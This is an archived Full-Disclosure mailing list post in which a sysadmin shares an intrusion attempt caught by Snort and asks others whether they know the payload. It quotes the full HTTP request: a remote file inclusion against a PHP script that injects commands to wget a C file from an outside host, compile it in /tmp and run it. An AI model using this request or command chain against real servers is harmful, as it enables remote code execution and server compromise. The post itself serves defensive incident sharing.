| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: dan at lockedbox.net (Dan) Subject: http://xfteam.net/fedor.c - Anyone seen this before?? I realised my foobar, just after I had posted. (DNS is resolving, I didnt try www. first) A tty capable daemon. Interesting.. Surly "they" realise that apache runs as a separate user on most systems(who runs it root?) It was the only hit from that netblock so I guess that it was a scan. And from looking at the google.jpg and the strings.txt i was lead to: http://www.arplhmd.cjb.net/ Looks like he makes some scripts/tools, noting a google tool which could account for the attempt on a dead link. Regards, Daniel. Dan <dan@...kedbox.net> wrote: > Hi, > Our Snort picked up an interesting attempt to download, compile and execute. > Noting also the fact that the sub dir its attempting to access has not been > there for over 4 months(/logjam/)? > > Has anyone actually seen what this fedor.c is? I have done some google'ing but > it comes up blank. > > Has anyone else noticed this kindof request recently? > > Is it just me or is xfteam.net not resolving anyway? > > Orignal HTTP request: > GET /logjam/showhits.php? > rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f > > Breaking this down we get(twice): > uname -a > cd /tmp > wget http://xfteam.net/fedor.c > gcc -o f fedor.c > ./f > > > Regards, > Daniel. > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html >
Powered by blists - more mailing lists